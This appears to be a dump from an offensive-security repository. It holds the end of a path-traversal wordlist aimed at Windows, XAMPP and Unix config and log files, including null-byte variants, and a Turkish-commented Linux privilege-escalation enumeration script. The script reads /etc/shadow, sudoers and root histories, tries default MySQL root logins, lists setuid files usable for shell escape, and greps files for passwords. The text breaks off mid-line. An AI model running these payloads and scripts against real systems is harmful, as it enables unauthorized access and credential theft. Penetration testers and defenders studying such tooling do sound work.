/windows/system32/drivers/etc/lmhosts.sam 1411 | /windows/system32/drivers/etc/networks 1412 | /windows/system32/drivers/etc/protocol 1413 | /windows/system32/drivers/etc/services 1414 | /windows/system32/logfiles/firewall/pfirewall.log 1415 | /windows/system32/logfiles/firewall/pfirewall.log.old 1416 | /windows/system32/logfiles/msftpsvc 1417 | /windows/system32/logfiles/msftpsvc1 1418 | /windows/system32/logfiles/msftpsvc2 1419 | /windows/system32/logfiles/smtpsvc 1420 | /windows/system32/logfiles/smtpsvc1 1421 | /windows/system32/logfiles/smtpsvc2 1422 | /windows/system32/logfiles/smtpsvc3 1423 | /windows/system32/logfiles/smtpsvc4 1424 | /windows/system32/logfiles/smtpsvc5 1425 | /windows/system32/logfiles/w3svc1/inetsvn1.log 1426 | /windows/system32/logfiles/w3svc2/inetsvn1.log 1427 | /windows/system32/logfiles/w3svc3/inetsvn1.log 1428 | /windows/system32/logfiles/w3svc/inetsvn1.log 1429 | /windows/system32/macromed/flash/flashinstall.log 1430 | /windows/system32/macromed/flash/install.log 1431 | /windows/updspapi.log 1432 | /windows/windowsupdate.log 1433 | /windows/wmsetup.log 1434 | /winnt/php.ini 1435 | /WINNT\php.ini 1436 | /WINNT\php.ini%00 1437 | /winnt/system32/logfiles/firewall/pfirewall.log 1438 | /winnt/system32/logfiles/firewall/pfirewall.log.old 1439 | /winnt/system32/logfiles/msftpsvc 1440 | /winnt/system32/logfiles/msftpsvc1 1441 | /winnt/system32/logfiles/msftpsvc2 1442 | /winnt/system32/logfiles/smtpsvc 1443 | /winnt/system32/logfiles/smtpsvc1 1444 | /winnt/system32/logfiles/smtpsvc2 1445 | /winnt/system32/logfiles/smtpsvc3 1446 | /winnt/system32/logfiles/smtpsvc4 1447 | /winnt/system32/logfiles/smtpsvc5 1448 | /winnt/system32/logfiles/w3svc1/inetsvn1.log 1449 | /winnt/system32/logfiles/w3svc2/inetsvn1.log 1450 | /winnt/system32/logfiles/w3svc3/inetsvn1.log 1451 | /winnt/system32/logfiles/w3svc/inetsvn1.log 1452 | /wp-config.php 1453 | /www/apache/conf/httpd.conf 1454 | /www/conf/httpd.conf 1455 | /www/logs/freebsddiary-access_log 1456 | /www/logs/freebsddiary-error.log 1457 | /www/logs/proftpd.system.log 1458 | /www/logs/proftpd.system.log%00 1459 | /xampp/apache/bin/php.ini 1460 | /xampp\apache\bin\php.ini 1461 | /xampp\apache\bin\php.ini%00 1462 | /xampp/apache/conf/httpd.conf 1463 | \xampp\apache\conf\httpd.conf 1464 | /xampp/apache/logs/access.log 1465 | \xampp\apache\logs\access.log 1466 | /xampp/apache/logs/error.log 1467 | \xampp\apache\logs\error.log 1468 | /xampp/filezillaftp/filezilla 1469 | \xampp\FileZillaFTP\FileZilla Server.xml 1470 | \xampp\FileZillaFTP\Logs 1471 | \xampp\FileZillaFTP\Logs\access.log 1472 | \xampp\FileZillaFTP\Logs\error.log 1473 | /xampp/htdocs/aca.txt 1474 | /xampp/htdocs/admin.php 1475 | /xampp/htdocs/leer.txt 1476 | \xampp\MercuryMail\LOGS\access.log 1477 | \xampp\MercuryMail\LOGS\error.log 1478 | /xampp/mercurymail/mercury.ini 1479 | \xampp\MercuryMail\mercury.ini 1480 | /xampp/mysql/data/{host}.err 1481 | /xampp/mysql/data/mysql-bin.index 1482 | /xampp/mysql/data/mysql.err 1483 | \xampp\mysql\data\mysql.err 1484 | \xampp\phpmyadmin\config.inc 1485 | \xampp\phpMyAdmin\config.inc 1486 | /xampp/phpmyadmin/config.inc.php 1487 | \xampp\phpmyadmin\config.inc.php 1488 | \xampp\phpMyAdmin\config.inc.php 1489 | \xampp\phpmyadmin\phpinfo.php 1490 | \xampp\phpMyAdmin\phpinfo.php 1491 | /xampp/php/php.ini 1492 | \xampp\php\php.ini 1493 | /xampp/sendmail/sendmail.ini 1494 | \xampp\sendmail\sendmail.ini 1495 | /xampp/sendmail/sendmail.log 1496 | \xampp\sendmail\sendmail.log 1497 | \xampp\tomcat\conf\tomcat-users.xml 1498 | \xampp\tomcat\conf\web.xml 1499 | /xampp/webalizer/webalizer.conf 1500 | \xampp\webalizer\webalizer.conf 1501 | \xampp\webdav\webdav.txt 1502 | /.xauthority 1503 | .Xauthority 1504 | .zhistory 1505 | .zsh_history 1506 | /.zshrc 1507 | .zshrc 1508 | -------------------------------------------------------------------------------- /linenumv2.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # linuxenum-btr.sh > privesc-enum.txt seklinde kullanalim 3 | # SCRIPTI /var/tmp DIZINI ALTINDA CALISTIRALIM 4 | # EGER SCRIPTI KULLANICINIZIN HOME DIZINI ALTINDA CALISTIRIRSANIZ KENDINIZE 5 | printf '\n=======================================================' 6 | printf '\nTEMEL BILGILER' 7 | printf '\n=======================================================' 8 | printf '\n*******************************************************\n' 9 | printf 'KULLANICI ADI - whoami' 10 | printf '\n*******************************************************\n' 11 | whoami 2>/dev/null 12 | printf '\n*******************************************************\n' 13 | printf 'KULLANICI ID SI VE GRUPLARI - id' 14 | printf '\n*******************************************************\n' 15 | id 2>/dev/null 16 | printf '\n*******************************************************\n' 17 | printf 'HOME DIZINIMIZ - echo $HOME' 18 | printf '\n*******************************************************\n' 19 | echo $HOME 2>/dev/null 20 | printf '\n*******************************************************\n' 21 | printf 'HOME DIZIN ICERIGIMIZ VE ERISIM HAKLARI - ls -ahl ~' 22 | printf '\n*******************************************************\n' 23 | ls -ahl ~ 2>/dev/null 24 | printf '\n*******************************************************\n' 25 | printf 'SUDO HAKLARIMIZ - sudo -l -n shell escape imkani verebilecek 26 | komutlara ozellikle dikkat' 27 | printf '\nCikti içinde !env_reset komutu varsa ve sudo versiyonu uygunsa 28 | cevresel degiskenler vasitasiyla priv esc yapilabilir' 29 | printf '\nsudo privilege escalation metodları: 30 | https://www.securusglobal.com/community/2014/03/17/how-i-got-root-with-sudo/' 31 | printf '\nsudo -l -n komutu ile parola vermeden sudo haklarimizi listelemeye 32 | calisiyoruz' 33 | printf '\nEger sudo -l komutu icin parola verilmesi gerekiyorsa ve biz 34 | baglantimizi parolasini bildigimiz bir kullanici ile gerceklestirmis isek bu 35 | komutu manuel olarak calistirmayi unutmayalim' 36 | printf '\n*******************************************************\n' 37 | sudo -l -n 2>/dev/null | tee sudo-config-enum.txt 38 | printf '\n*******************************************************\n' 39 | printf 'SHELL ESCAPE IMKANI VEREN SUDO HAKLARIMIZ - grep komutu ilgisiz 40 | satirlari da yakalayabiliyor o yuzden scripti okuyunuz - tcpdump makalesi 41 | https://www.stevencampbell.info/2016/04/why-sudo-tcpdump-is-dangerous/' 42 | printf '\n*******************************************************\n' 43 | cat sudo-config-enum.txt 2>/dev/null | grep -i -E 'vi|awk|perl|find|nmap|man|more|less|tcpdump|bash|sh|vim|nc|netcat|python|ruby|lua|irb' 44 | printf '\n*******************************************************\n' 45 | printf 'SUDO VERSIYONU - sudo -V: sudo - sudoedit ile ilgili acikliklari 46 | kullanabiliriz 1.8.14 versiyonu icin bakiniz https://www.exploitdb.com/exploits/37710/ 47 | 1.6.9p21 / 1.7.2p4 için bakiniz https://www.exploitdb.com/exploits/11651/ 48 | digerleri icin mutlaka google dan arama yapiniz' 49 | printf '\n*******************************************************\n' 50 | sudo -V 51 | printf '\n*******************************************************\n' 52 | printf 'REDHAT ICIN SUDO PAKETI VERSIYONU' 53 | printf '\n*******************************************************\n' 54 | rpm -q sudo 2>/dev/null 55 | printf '\n*******************************************************\n' 56 | printf 'SUDOERS DOSYASI ERISIM HAKLARI' 57 | printf '\n*******************************************************\n' 58 | ls -al /etc/sudoers 2>/dev/null 59 | printf '\n*******************************************************\n' 60 | printf 'SUDOERS DOSYASI ICERIGI- GOREBILIYORSAK - cat /etc/sudoers' 61 | printf '\n*******************************************************\n' 62 | cat /etc/sudoers 2>/dev/null 63 | printf '\n*******************************************************\n' 64 | printf 'SISTEM BILGISI - uname -a' 65 | printf '\n*******************************************************\n' 66 | uname -a 2>/dev/null 67 | printf '\n*******************************************************\n' 68 | printf 'KERNEL BILGISI - cat /proc/version' 69 | printf '\n*******************************************************\n' 70 | cat /proc/version 2>/dev/null 71 | printf '\n*******************************************************\n' 72 | printf 'ISLEMCI MIMARI BILGISI - lscpu' 73 | printf '\n*******************************************************\n' 74 | lscpu 2>/dev/null 75 | printf '\n*******************************************************\n' 76 | printf 'ISLETIM SISTEMI BILGISI' 77 | printf '\n*******************************************************\n' 78 | cat /etc/*-release 79 | printf '\n*******************************************************\n' 80 | printf 'SUNUCU ADI - hostname' 81 | printf '\n*******************************************************\n' 82 | hostname 2>/dev/null 83 | printf '\n*******************************************************\n' 84 | printf 'ROOT - YANI ID SI 0 OLAN - KULLANICILARIN LISTESI' 85 | printf '\n*******************************************************\n' 86 | grep -v -E '^#' /etc/passwd | awk -F: '$3 == 0{print $1}' 87 | printf '\n*******************************************************\n' 88 | printf 'SUDO GRUBUNA UYE KULLANICILAR' 89 | printf '\n*******************************************************\n' 90 | for i in $(cat /etc/passwd 2>/dev/null| cut -d':' -f1 2>/dev/null);do id $i;done 2>/dev/null | grep -i "sudo" 91 | printf '\n*******************************************************\n' 92 | printf 'PASSWD DOSYASI - cat /etc/passwd' 93 | printf '\n*******************************************************\n' 94 | cat /etc/passwd 2>/dev/null 95 | printf '\n*******************************************************\n' 96 | printf 'FREEBSD ICIN PASSWD DOSYASI - cat /etc/master.passwd' 97 | printf '\n*******************************************************\n' 98 | cat /etc/master.passwd 2>/dev/null 99 | printf '\n*******************************************************\n' 100 | printf 'KULLANICILARIN GRUP UYELIKLERI - groups bolumune bakiniz' 101 | printf '\n*******************************************************\n' 102 | for i in $(cat /etc/passwd 2>/dev/null| cut -d':' -f1 2>/dev/null);do id $i;done 2>/dev/null 103 | printf '\n*******************************************************\n' 104 | printf 'KULLANICI LISTESI - SHELL UYGULAMASINA GORE SIRALI - cat /etc/passwd 105 | | awk -F: {print $7\011$1} | sort' 106 | printf '\n*******************************************************\n' 107 | cat /etc/passwd | awk -F':' '{print $7"\011"$1}' | sort 108 | printf '\n*******************************************************\n' 109 | printf 'KULLANICI LISTESI - HOME DIZININE GORE SIRALI - cat /etc/passwd | awk 110 | -F: {print $6\011$1} | sort' 111 | printf '\n*******************************************************\n' 112 | cat /etc/passwd | awk -F':' '{print $6"\011"$1}' | sort 113 | printf '\n*******************************************************\n' 114 | printf 'DAHA ONCE LOGON OLMUS KULLANICILAR - HER ZAMAN SAGLIKLI BILGI VERMEYEBILIR - lastlog | grep -v Never' 115 | printf '\n*******************************************************\n' 116 | lastlog | grep -v "Never" 2>/dev/null 117 | printf '\n*******************************************************\n' 118 | printf 'SON KULLANICI AKTIVITELERI - last' 119 | printf '\n*******************************************************\n' 120 | last 2>/dev/null 121 | printf '\n*******************************************************\n' 122 | printf 'GROUP DOSYASI - cat /etc/group - ozellikle sudo grup uyeliklerine 123 | dikkat edelim' 124 | printf '\n*******************************************************\n' 125 | cat /etc/group 2>/dev/null 126 | printf '\n*******************************************************\n' 127 | printf 'SHADOW DOSYASI - GOREBILIYORSAK - cat /etc/shadow' 128 | printf '\n*******************************************************\n' 129 | cat /etc/shadow 2>/dev/null 130 | printf '\n*******************************************************\n' 131 | printf '/ROOT/ DIZINI ALTINDAKI DOSYALAR VE ERISIM HAKLARI - ls -ahlR /root/' 132 | printf '\n*******************************************************\n' 133 | ls -ahlR /root/ 2>/dev/null 134 | printf '\n*******************************************************\n' 135 | printf '/HOME/ DIZINI ALTINDAKI DOSYALAR VE ERISIM HAKLARI - ls -ahlR /home/' 136 | printf '\n*******************************************************\n' 137 | ls -ahlR /home/ 2>/dev/null 138 | printf '\n*******************************************************\n' 139 | printf 'EGER HOME DIZINLERI /USR/ DIZINI ALTINDA ISE BURADAKI DOSYALAR VE 140 | ERISIM HAKLARI - ls -ahlR /usr/home/' 141 | printf '\n*******************************************************\n' 142 | ls -ahlR /usr/home/ 2>/dev/null 143 | printf '\n*******************************************************\n' 144 | printf '/HOME/ DIZINI ALTINDAKI OKUNABILIR DOSYALARIN LISTESI - find /home/ - 145 | perm -4 -type f -exec ls -al {} \;' 146 | printf '\nNOT: Bu komut manuel inceleme sirasında da hedef dizin adi 147 | degistirilerek kullanilabilir' 148 | printf '\n*******************************************************\n' 149 | find /home/ -perm -4 -type f -exec ls -al {} \; 2>/dev/null 150 | printf '\n*******************************************************\n' 151 | printf 'BAZI HASSAS DOSYALARIN ERISIM HAKLARI - EKLEME YAPILABILIR' 152 | printf '\nNOT: History dosyalari v.d. dosyalar icinde okuma hakkimiz 153 | olanlarin icine manuel olarak goz atilmalidir' 154 | printf '\n*******************************************************\n' 155 | ls -la /etc/passwd 2>/dev/null 156 | ls -la /etc/group 2>/dev/null 157 | ls -la /etc/profile 2>/dev/null 158 | ls -la /etc/shadow 2>/dev/null 159 | ls -la /etc/master.passwd 2>/dev/null 160 | ls -la /etc/sudoers 2>/dev/null 161 | ls -la /etc/crontab 2>/dev/null 162 | ls -la ~/.*_history 2>/dev/null 163 | ls -la /home/*/.*_history 2>/dev/null 164 | ls -la /root/.*_history 2>/dev/null 165 | printf '\n*******************************************************\n' 166 | printf 'KULLANICIMIZIN HISTORY DOSYALARI ICERIKLERI' 167 | printf '\n*******************************************************\n' 168 | cat ~/.*_history 2>/dev/null 169 | printf '\n*******************************************************\n' 170 | printf 'KULLANICIMIZIN HISTORY BILGISI - history KOMUTU CIKTISI' 171 | printf '\n*******************************************************\n' 172 | history 2>/dev/null 173 | printf '\n*******************************************************\n' 174 | printf 'OKUYABILIYORSAK ROOT UN HISTORY DOSYALARI ICERIKLERI' 175 | printf '\n*******************************************************\n' 176 | cat /root/.*_history 2>/dev/null 177 | printf '\n*******************************************************\n' 178 | printf 'OKUYABILDIGIMIZ KULLANICI HISTORY DOSYALARI ICERIKLERI' 179 | printf '\n*******************************************************\n' 180 | cat /home/*/.*_history 2>/dev/null 181 | printf '\n*******************************************************\n' 182 | printf 'TCP SERVISLERIN VE ILGILI PROSESLERIN LISTESI - netstat -antp' 183 | printf '\n*******************************************************\n' 184 | netstat -antp 185 | printf '\n*******************************************************\n' 186 | printf 'UDP SERVISLERIN VE ILGILI PROSESLERIN LISTESI - netstat –anup' 187 | printf '\n*******************************************************\n' 188 | netstat -anup 189 | printf '\n*******************************************************\n' 190 | printf 'ROOT KULLANICISI OLARAK CALISAN PROSESLER' 191 | printf '\n*******************************************************\n' 192 | ps aux | grep root 193 | printf '\n*******************************************************\n' 194 | printf 'TUM PROSESLERIN LISTESI - ps aux - ozellikle MySQL ve Apache prosesleri uzerinden islem yapmak istersek bu proseslerin hangi kullanici haklari ile calistigina dikkat edelim. Bunun disinda calisan prosesler bize baska fikirler verebilir.' 195 | printf '\n*******************************************************\n' 196 | ps aux 197 | printf '\n*******************************************************\n' 198 | printf 'CALISAN PROSESLERIN IMAJLARI VE BUNLARA ERISIM HAKLARI - ps aux | awk 199 | {print $11}|xargs -r ls -la 2>/dev/null |awk !x[$0]++' 200 | printf '\n*******************************************************\n' 201 | ps aux | awk '{print $11}'|xargs -r ls -la 2>/dev/null |awk '!x[$0]++' 202 | printf '\n*******************************************************\n' 203 | printf 'ENVIRONMENT VARIABLE DEGERLERI' 204 | printf '\n*******************************************************\n' 205 | printenv 206 | printf '\n=======================================================' 207 | printf '\nPRATIK YETKI YUKSELTME ALANLARI' 208 | printf '\n=======================================================' 209 | printf '\n*******************************************************\n' 210 | printf 'SAHIBI ROOT OLAN OTHER TARAFINDAN YAZILABILIR SETUID DOSYALAR - find 211 | / -uid 0 -perm -4002 -type f -exec ls -al {} \;' 212 | printf '\n*******************************************************\n' 213 | find / -uid 0 -perm -4002 -type f -exec ls -al {} \; 2>/dev/null 214 | printf '\n*******************************************************\n' 215 | printf 'OTHER TARAFINDAN YAZILABILIR TUM SETUID DOSYALAR - find / -perm -4002-type f -exec ls -al {} \;' 216 | printf '\n*******************************************************\n' 217 | find / -perm -4002 -type f -exec ls -al {} \; 2>/dev/null 218 | printf '\n*******************************************************\n' 219 | printf 'TUM SETUID DOSYALAR - find / -perm -4000 -type f -exec ls -al {} \; 220 | Bu dosyalar arasinda grubumuzun yazma hakki olanlara da dikkat edelim, cunku 221 | bu durum icin ozel bir sorgumuz yok' 222 | printf '\n*******************************************************\n' 223 | find / -perm -4000 -type f -exec ls -al {} \; 2>/dev/null | tee setuid-filesenum.txt 224 | printf '\n*******************************************************\n' 225 | printf 'SHELL ESCAPE IMKANI VEREN SETUID DOSYALAR - False positive satirlari 226 | elle incelemek gereklidir, aradigimiz uygulama isimleri icin scripti 227 | okuyunuz' 228 | printf '\n*******************************************************\n' 229 | cat setuid-files-enum.txt 2>/dev/null | grep -i -E 'vi|awk|perl|find|nmap|man|more|less|tcpdump|bash|sh$|vim|nc$|netcat|python|ruby|lua|irb' | grep -v -E 'chsh|device' 230 | printf '\n*******************************************************\n' 231 | printf 'SAHIBI ROOT OLAN OTHER TARAFINDAN YAZILABILIR SETGID DOSYALAR - find/ -uid 0 -perm -2002 -type f -exec ls -al {} \;' 232 | printf '\n*******************************************************\n' 233 | find / -uid 0 -perm -2002 -type f -exec ls -al {} \; 2>/dev/null 234 | printf '\n*******************************************************\n' 235 | printf 'OTHER TARAFINDAN YAZILABILIR TUM SETGID DOSYALAR - find / -perm -2002 -type f' 236 | printf '\n*******************************************************\n' 237 | find / -perm -2002 -type f -exec ls -al {} \; 2>/dev/null 238 | printf '\n*******************************************************\n' 239 | printf 'SETGID ISARETLI TUM DOSYALAR - find / -perm -2000 -type f -exec ls -al {} \;' 240 | printf '\n*******************************************************\n' 241 | find / -perm -2000 -type f -exec ls -al {} \; 2>/dev/null 242 | printf '\n*******************************************************\n' 243 | printf '/ETC/CRON DIZINLERINDE BULUNAN DOSYALAR VE ERISIM HAKLARI - ls -la /etc/cron*' 244 | printf '\n*******************************************************\n' 245 | ls -la /etc/cron* 2>/dev/null 246 | printf '\n*******************************************************\n' 247 | printf 'OTHER TARAFINDAN YAZILABILIR CRON SCRIPTLERI VE ICERIKLERI - find 248 | /etc/cron* -perm -0002 -exec ls -la {} \; -exec cat {} 2>/dev/null \;' 249 | printf '\n*******************************************************\n' 250 | find /etc/cron* -perm -0002 -exec ls -la {} \; -exec cat {} 2>/dev/null \; 251 | printf '\n*******************************************************\n' 252 | printf '/ETC/CRONTAB DOSYASI ICERIGI - cat /etc/crontab' 253 | printf '\n*******************************************************\n' 254 | cat /etc/crontab 2>/dev/null 255 | printf '\n*******************************************************\n' 256 | printf 'VARSA ROOT VE DIGER KULLANICILARIN CRONTAB DOSYALARI LISTESI - ls -laR /var/spool/cron' 257 | printf '\n*******************************************************\n' 258 | ls -laR /var/spool/cron 2>/dev/null 259 | printf '\n*******************************************************\n' 260 | printf 'VARSA ROOT VE DIGER KULLANICILARIN CRONTAB DOSYALARI ICERIKLERI' 261 | printf '\n*******************************************************\n' 262 | find /var/spool/cron/ -type f -exec tail -n +1 {} + 2>/dev/null 263 | printf '\n*******************************************************\n' 264 | printf 'VARSA /etc/cron.d DIZININDE BULUNAN DOSYALARIN LISTESI - ls -laR 265 | /etc/cron.d' 266 | printf '\n*******************************************************\n' 267 | ls -laR /etc/cron.d 2>/dev/null 268 | printf '\n*******************************************************\n' 269 | printf 'VARSA /etc/cron.d DIZININDE BULUNAN DOSYALARIN ICERIKLERI' 270 | printf '\n*******************************************************\n' 271 | find /etc/cron.d/ -type f -exec tail -n +1 {} + 2>/dev/null 272 | printf '\n*******************************************************\n' 273 | printf '/ETC/ANACRONTAB DOSYASI ICERIGI - cat /etc/anacrontab' 274 | printf '\n*******************************************************\n' 275 | cat /etc/anacrontab 2>/dev/null 276 | printf '\n*******************************************************\n' 277 | printf 'VARSA KULLANICILARIN AKTIF CRON KONFIGURASYONLARI - cat /etc/passwd | 278 | cut -d : -f 1 | xargs -n1 crontab -l -u' 279 | printf '\n*******************************************************\n' 280 | cat /etc/passwd | cut -d ":" -f 1 | xargs -n1 crontab -l -u 2>/dev/null 281 | printf '\n*******************************************************\n' 282 | printf 'MYSQL E ROOT - ROOT ERISIM BILGILERIYLE ERISEBILIYOR MUYUZ -mysqladmin -uroot -proot version' 283 | printf '\n*******************************************************\n' 284 | mysqladmin -uroot -proot version 285 | printf '\n*******************************************************\n' 286 | printf 'MYSQL E BOS PAROLA ILE ROOT OLARAK ERISEBILIYOR MUYUZ - mysqladmin -uroot version' 287 | printf '\n*******************************************************\n' 288 | mysqladmin -uroot version 289 | printf '\n*******************************************************\n' 290 | printf '*** Postgre SQL varsa onun icin de ayrica komutlar calistirilabilir,process listesine gore hareket etmek lazim ***' 291 | printf '\n*******************************************************\n' 292 | printf '\n*******************************************************\n' 293 | printf 'VERSIYON BILGILERI - TOPLUCA' 294 | printf '\n*******************************************************\n' 295 | printf '\nSUDO - VERSIYON - PRIVESC ACIKLIKLARINI KONTROL ET http://www.exploitdb.com/search/?action=search&filter_page=1&filter_description=sudo' 296 | printf '\n..................................\n' 297 | sudo -V | grep version 2>/dev/null 298 | printf '\nMYSQL - VERSIYON' 299 | printf '\n..................................\n' 300 | mysql --version 2>/dev/null 301 | printf '\nPOSTGRESQL - VERSIYON' 302 | printf '\n..................................\n' 303 | psql -V 304 | printf '\nAPACHE - VERSIYON' 305 | printf '\n..................................\n' 306 | apache2 -v 2>/dev/null; apache2ctl -M 2>/dev/null; httpd -v 2>/dev/null; 307 | apachectl -l 2>/dev/null 308 | printf '\nPERL - VERSIYON' 309 | printf '\n..................................\n' 310 | perl -v 2>/dev/null 311 | printf '\nJAVA - VERSIYON' 312 | printf '\n..................................\n' 313 | java -version 2>/dev/null 314 | printf '\nPYTHON - VERSIYON' 315 | printf '\n..................................\n' 316 | python --version 2>/dev/null 317 | printf '\nRUBY - VERSIYON' 318 | printf '\n..................................\n' 319 | ruby -v 2>/dev/null 320 | printf '\n=======================================================' 321 | printf '\nUZUN INCELEME' 322 | printf '\n=======================================================' 323 | printf '\n*******************************************************\n' 324 | printf 'DIZIN VE DOSYA LISTESINI OLUSTURUYORUZ - find / > dirlist-enum.txt' 325 | printf '\n*******************************************************\n' 326 | find / > dirlist-enum.txt 2>/dev/null 327 | printf 'dirlist-enum.txt dosyasi olusturuldu.\n' 328 | printf '\n*******************************************************\n' 329 | printf 'SONU INI ILE BITEN DOSYALARIN LISTESI - grep -i -E ini$ dirlistenum.txt > ini-files-enum.txt' 330 | printf '\nNOT: Uzun suren incelemelerde ini, conf, backup v.b. dosyalarin icerigini manuel olarak inceleyiniz.' 331 | printf '\n*******************************************************\n' 332 | grep -i -E 'ini$' dirlist-enum.txt > ini-files-enum.txt 333 | printf 'ini-files-enum.txt dosyasi olusturuldu.\n' 334 | printf '\n*******************************************************\n' 335 | printf 'SONU CONF, CONFIG VE CNF ILE BITEN DOSYALARIN LISTESI - grep -i -E conf$|config$|cnf$ dirlist-enum.txt > conf-files-enum.txt' 336 | printf '\n*******************************************************\n' 337 | grep -i -E 'conf$|config$|cnf$' dirlist-enum.txt > conf-files-enum.txt 338 | printf 'conf-files-enum.txt dosyasi olusturuldu.\n' 339 | printf '\n*******************************************************\n' 340 | printf 'SONU BACKUP, BCK, BAK, OLD ILE BITEN DOSYALARIN LISTESI - grep -i -E backup$|bck$|bak$|old$ dirlist-enum.txt > backup-files-enum.txt' 341 | printf '\n*******************************************************\n' 342 | grep -i -E 'backup$|bck$|bak$|\.old.*$' dirlist-enum.txt > backup-filesenum.txt 343 | printf 'backup-files-enum.txt dosyasi olusturuldu.\n' 344 | printf '\n*******************************************************\n' 345 | printf 'SONU CAP ILE BITEN DOSYALARIN LISTESI - grep -i -E cap$ dirlistenum.txt > capture-files-enum.txt - dosya tipinden emin olmak icin file komutunu kullanabilirsiniz' 346 | printf '\n*******************************************************\n' 347 | grep -i -E 'cap$' dirlist-enum.txt > capture-files-enum.txt 348 | printf 'capture-files-enum.txt dosyasi olusturuldu.\n' 349 | printf '\n*******************************************************\n' 350 | printf 'SONU .PHP ILE BITEN DOSYALARIN LISTESI - grep -i -E .php$ dirlistenum.txt > php-files-enum.txt' 351 | printf '\n*******************************************************\n' 352 | grep -i -E '\.php$' dirlist-enum.txt > php-files-enum.txt 353 | printf 'php-files-enum.txt dosyasi olusturuldu.\n' 354 | printf '\n*******************************************************\n' 355 | printf 'SONU .PL ILE BITEN DOSYALARIN LISTESI - grep -i -E .pl$ dirlistenum.txt > pl-files-enum.txt' 356 | printf '\n*******************************************************\n' 357 | grep -i -E '\.pl$' dirlist-enum.txt > pl-files-enum.txt 358 | printf 'pl-files-enum.txt dosyasi olusturuldu.\n' 359 | printf '\n*******************************************************\n' 360 | printf 'SONU .SH ILE BITEN DOSYALARIN LISTESI - grep -i -E .sh$ dirlistenum.txt > sh-files-enum.txt' 361 | printf '\n*******************************************************\n' 362 | grep -i -E '\.sh$' dirlist-enum.txt > sh-files-enum.txt 363 | printf 'sh-files-enum.txt dosyasi olusturuldu.\n' 364 | printf '\n*******************************************************\n' 365 | printf 'SONU LOG ILE BITEN DOSYALARIN LISTESI - grep -i -E log$ dirlistenum.txt > log-files-enum.txt' 366 | printf '\n*******************************************************\n' 367 | grep -i -E 'log$' dirlist-enum.txt > log-files-enum.txt 368 | printf 'log-files-enum.txt dosyasi olusturuldu.\n' 369 | printf '\n*******************************************************\n' 370 | printf 'SONU INC ILE BITEN DOSYALARIN LISTESI - grep -i -E log$ dirlistenum.txt > inc-files-enum.txt' 371 | printf '\n*******************************************************\n' 372 | grep -i -E 'inc$' dirlist-enum.txt > inc-files-enum.txt 373 | printf 'inc-files-enum.txt dosyasi olusturuldu.\n' 374 | printf 'SONU MYD ILE BITEN DOSYALARIN LISTESI - grep -i -E myd$ dirlistenum.txt > myd-files-enum.txt' 375 | printf '\n*******************************************************\n' 376 | grep -i -E 'myd$' dirlist-enum.txt > myd-files-enum.txt 377 | printf 'myd-files-enum.txt dosyasi olusturuldu.\n' 378 | printf '\n*******************************************************\n' 379 | printf 'ICINDE SHADOW GECEN DIZIN VEYA DOSYALARIN LISTESI - grep -i -E ini$ dirlist-enum.txt > ini-files-enum.txt' 380 | printf '\n*******************************************************\n' 381 | grep -i -E 'shadow' dirlist-enum.txt | xargs ls -al 2>/dev/null 382 | printf '\n*******************************************************\n' 383 | printf 'ICINDE PASS GECEN DIZIN VEYA DOSYALARIN LISTESI' 384 | printf '\n*******************************************************\n' 385 | grep -i -E 'pass' dirlist-enum.txt | xargs ls -al 2>/dev/null 386 | printf '\n*******************************************************\n' 387 | printf 'ICINDE CRON GECEN DIZIN VEYA DOSYALARIN LISTESI - Bu dosyalara manuel olarak bakilmalidir' 388 | printf '\n*******************************************************\n' 389 | grep -i -E 'cron' dirlist-enum.txt | xargs ls -al 2>/dev/null 390 | printf '\n*******************************************************\n' 391 | printf 'ICINDE HISTORY GECEN DIZIN VEYA DOSYALARIN LISTESI' 392 | printf '\n*******************************************************\n' 393 | grep -i -E 'history' dirlist-enum.txt | xargs ls -al 2>/dev/null 394 | printf '\n*******************************************************\n' 395 | printf 'MY.CNF ADLI DOSYALARIN LISTESI' 396 | printf '\n*******************************************************\n' 397 | grep -i -E 'my\.cnf$' dirlist-enum.txt | xargs -r ls -al 2>/dev/null 398 | printf '\n*******************************************************\n' 399 | printf 'MY.CONF ADLI DOSYALARIN LISTESI' 400 | printf '\n*******************************************************\n' 401 | grep -i -E 'my\.conf$' dirlist-enum.txt | xargs -r ls -al 2>/dev/null 402 | printf '\n*******************************************************\n' 403 | printf '==OZET PASSWORD SATIRLARI==' 404 | printf '\n*******************************************************\n' 405 | printf '\n*******************************************************\n' 406 | printf 'INI DOSYALARI ICINDE GECEN PASSWORD VE USERNAME SATIRLARI' 407 | printf '\n*******************************************************\n' 408 | cat ini-files-enum.txt | xargs grep -i -E 'pass =|passwd =|pwd =| password =|user =|username =|pass=|passwd=|pwd=|password=|user=|username=|mysql_connect|mysql_select_db' 2>/dev/null 409 | printf '\n*******************************************************\n' 410 | printf 'CONF DOSYALARI ICINDE GECEN PASSWORD VE USERNAME SATIRLARI' 411 | printf '\n*******************************************************\n' 412 | cat conf-files-enum.txt | xargs grep -i -E 'pass =|passwd =|pwd =| password =|user =|username =|pass=|passwd=|pwd=|password=|user=|username=|mysql_connect|mysql_select_db' 2>/dev/null 413 | printf '\n*******************************************************\n' 414 | printf 'PHP DOSYALARI ICINDE GECEN PASSWORD VE USERNAME SATIRLARI' 415 | printf '\n*******************************************************\n' 416 | cat php-files-enum.txt | xargs grep -i -E 'pass =|passwd =|pwd =| password =|user =|username =|pass=|passwd=|pwd=|password=|user=|username=|mysql_connect|mysql_select_db' 2>/dev/null 417 | printf '\n*******************************************************\n' 418 | printf 'PERL DOSYALARI ICINDE GECEN PASSWORD VE USERNAME SATIRLARI' 419 | printf '\n*******************************************************\n' 420 | cat pl-files-enum.txt | xargs grep -i -E 'pass =|passwd =|pwd =| password =|user =|username =|pass=|passwd=|pwd=|password=|user=|username=|mysql_connect|mysql_select_db' 2>/dev/null 421 | printf '\n*******************************************************\n' 422 | printf 'SH DOSYALARI ICINDE GECEN PASSWORD VE USERNAME SATIRLARI' 423 | printf '\n*******************************************************\n' 424 | cat sh-files-enum.txt | xargs grep -i -E 'pass =|passwd =|pwd =| password =|user =|username =|pass=|passwd=|pwd=|password=|user=|username=|mysql_connect|mysql_select_db' 2>/dev/null 425 | printf '\n*******************************************************\n' 426 | printf 'LOG DOSYALARI ICINDE GECEN PASSWORD VE USERNAME SATIRLARI' 427 | printf '\n*******************************************************\n' 428 | cat log-files-enum.txt | xargs grep -i -E 'pass =|passwd =|pwd =| password =|user =|username =|pass=|passwd=|pwd=|password=|user=|username=|mysql_connect|mysql_select_db' 2>/dev/null 429 | printf '\n*******************************************************\n' 430 | printf 'INC 